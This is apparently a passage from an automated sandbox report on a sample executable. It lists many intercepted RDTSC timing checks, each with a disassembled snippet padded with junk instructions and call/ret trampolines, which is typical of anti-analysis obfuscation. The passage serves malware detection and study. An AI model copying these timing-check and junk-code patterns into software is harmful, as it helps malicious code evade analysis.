                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E90BF second address: 7E90CD instructions: 0x00000000 rdtsc 0x00000002 js 00007F8314EA9186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E9B9B second address: 7E9BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E9BA0 second address: 7E9BB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F8314EA9186h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7E9BB7 second address: 7E9BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EA579 second address: 7EA5D5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8314EA9188h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jg 00007F8314EA9194h 0x00000013 nop 0x00000014 mov esi, dword ptr [ebp+122D235Fh] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F8314EA9188h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 cld 0x00000037 push 00000000h 0x00000039 mov esi, dword ptr [ebp+122D2DEEh] 0x0000003f xchg eax, ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EA5D5 second address: 7EA5DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7ECBC9 second address: 7ECBE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnp 00007F8314EA9197h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7ACD15 second address: 7ACD19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7ACD19 second address: 7ACD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8314EA9190h 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F8314EA9186h 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7ACD41 second address: 7ACD71 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F83146B40C6h 0x00000008 js 00007F83146B40C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 jns 00007F83146B40C6h 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F83146B40D2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7ACD71 second address: 7ACD75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7ACD75 second address: 7ACD84 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F83146B40C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7ACD84 second address: 7ACD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F0E5E second address: 7F0E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F0E64 second address: 7F0EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8314EA9198h 0x0000000a jmp 00007F8314EA9196h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007F8314EA9195h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F0EB3 second address: 7F0EB9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F2437 second address: 7F2440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F2440 second address: 7F2444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F33C3 second address: 7F3449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bl, 81h 0x0000000c call 00007F8314EA9198h 0x00000011 mov bl, 49h 0x00000013 pop edi 0x00000014 push 00000000h 0x00000016 movzx ebx, bx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F8314EA9188h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 call 00007F8314EA918Ah 0x0000003a mov ebx, dword ptr [ebp+122D380Dh] 0x00000040 pop edi 0x00000041 mov dword ptr [ebp+122D2E2Ah], edx 0x00000047 xchg eax, esi 0x00000048 push esi 0x00000049 pushad 0x0000004a jp 00007F8314EA9186h 0x00000050 jmp 00007F8314EA9192h 0x00000055 popad 0x00000056 pop esi 0x00000057 push eax 0x00000058 pushad 0x00000059 push edi 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F26D6 second address: 7F26DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F358C second address: 7F3590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F5392 second address: 7F5398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F465F second address: 7F4664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F54C7 second address: 7F54E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F54E0 second address: 7F54FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F8314EA918Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e js 00007F8314EA91A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F7321 second address: 7F73A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F83146B40C6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F83146B40C8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov di, DC91h 0x0000002b push 00000000h 0x0000002d call 00007F83146B40CAh 0x00000032 jmp 00007F83146B40CBh 0x00000037 pop ebx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F83146B40C8h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov ebx, dword ptr [ebp+122D3084h] 0x0000005a xchg eax, esi 0x0000005b pushad 0x0000005c pushad 0x0000005d jnc 00007F83146B40C6h 0x00000063 push edx 0x00000064 pop edx 0x00000065 popad 0x00000066 push eax 0x00000067 push edx 0x00000068 je 00007F83146B40C6h 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F752D second address: 7F7532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F8707 second address: 7F870C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F94FB second address: 7F94FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F94FF second address: 7F95A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F83146B40C8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 jmp 00007F83146B40D5h 0x00000029 push dword ptr fs:[00000000h] 0x00000030 sub edi, 57289D00h 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d xor dword ptr [ebp+122D2D86h], esi 0x00000043 mov eax, dword ptr [ebp+122D1355h] 0x00000049 jmp 00007F83146B40D1h 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push eax 0x00000053 call 00007F83146B40C8h 0x00000058 pop eax 0x00000059 mov dword ptr [esp+04h], eax 0x0000005d add dword ptr [esp+04h], 0000001Dh 0x00000065 inc eax 0x00000066 push eax 0x00000067 ret 0x00000068 pop eax 0x00000069 ret 0x0000006a nop 0x0000006b push ecx 0x0000006c jng 00007F83146B40CCh 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F95A4 second address: 7F95B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F95B0 second address: 7F95B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7F95B4 second address: 7F95BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7FE682 second address: 7FE68C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7FE68C second address: 7FE690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7FE838 second address: 7FE863 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F83146B40D3h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jg 00007F83146B40CCh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7FE863 second address: 7FE867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7FFA8B second address: 7FFB3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F83146B40D1h 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D308Ah], eax 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F83146B40C8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov bl, 15h 0x0000003d mov eax, dword ptr [ebp+122D1549h] 0x00000043 jl 00007F83146B40D8h 0x00000049 push edx 0x0000004a call 00007F83146B40CFh 0x0000004f pop ebx 0x00000050 pop ebx 0x00000051 mov dword ptr [ebp+122D2E86h], esi 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push ebp 0x0000005c call 00007F83146B40C8h 0x00000061 pop ebp 0x00000062 mov dword ptr [esp+04h], ebp 0x00000066 add dword ptr [esp+04h], 00000019h 0x0000006e inc ebp 0x0000006f push ebp 0x00000070 ret 0x00000071 pop ebp 0x00000072 ret 0x00000073 add bx, 5406h 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007F83146B40D4h 0x00000080 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 806856 second address: 80685A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 80685A second address: 806863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7AE96F second address: 7AE98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8314EA9193h 0x0000000c jne 00007F8314EA9186h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7AE98F second address: 7AE999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7AE999 second address: 7AE99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 80B44E second address: 80B458 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F83146B40C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 80B458 second address: 80B464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 80B464 second address: 80B489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F83146B40E0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 80B489 second address: 80B4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8314EA9194h 0x00000009 js 00007F8314EA9188h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 80F4FB second address: 80F4FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 80F4FF second address: 80F520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8314EA9198h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 80F520 second address: 80F530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F83146B40C6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8157EF second address: 8157F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8157F5 second address: 815845 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F83146B40D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F83146B40D6h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007F83146B40CCh 0x0000001c jmp 00007F83146B40CAh 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 815845 second address: 81584A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 814CEC second address: 814D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83146B40D5h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edi 0x0000000d push eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 814F6F second address: 814F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8314EA9186h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8153FA second address: 8153FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 819BD8 second address: 819BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F8314EA9186h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 819BED second address: 819C1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D5h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F83146B40D1h 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 819C1F second address: 819C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 819C25 second address: 819C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 818996 second address: 8189A2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8314EA9186h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 8189A2 second address: 8189A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7ED70E second address: 7ED714 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7ED714 second address: 7ED77E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F83146B40CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F83146B40C8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 lea eax, dword ptr [ebp+124813F9h] 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F83146B40C8h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 or dword ptr [ebp+122D1C25h], ecx 0x0000004d push eax 0x0000004e pushad 0x0000004f jnp 00007F83146B40C8h 0x00000055 push eax 0x00000056 push edx 0x00000057 push edx 0x00000058 pop edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EDE6A second address: 7EDE8B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 105DDA01h 0x0000000f mov dx, BCD2h 0x00000013 call 00007F8314EA9189h 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EDE8B second address: 7EDE8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EDE8F second address: 7EDE9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EDE9D second address: 7EDEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F83146B40D4h 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EDEC1 second address: 7EDECB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8314EA9186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EDECB second address: 7EDED0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EEB86 second address: 7EEB8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EEC75 second address: 7EECA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1C25h], edx 0x0000000f jno 00007F83146B40CCh 0x00000015 lea eax, dword ptr [ebp+1248143Dh] 0x0000001b cmc 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 jmp 00007F83146B40CCh 0x00000025 pop edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EECA8 second address: 7EECB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8314EA9186h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EECB2 second address: 7EECB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7EECB6 second address: 7D009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007F8314EA9196h 0x0000000f jmp 00007F8314EA9190h 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F8314EA9188h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f pushad 0x00000030 mov dword ptr [ebp+122D1CC2h], ebx 0x00000036 pushad 0x00000037 mov eax, edx 0x00000039 mov edi, esi 0x0000003b popad 0x0000003c popad 0x0000003d lea eax, dword ptr [ebp+124813F9h] 0x00000043 movzx edi, cx 0x00000046 push eax 0x00000047 jmp 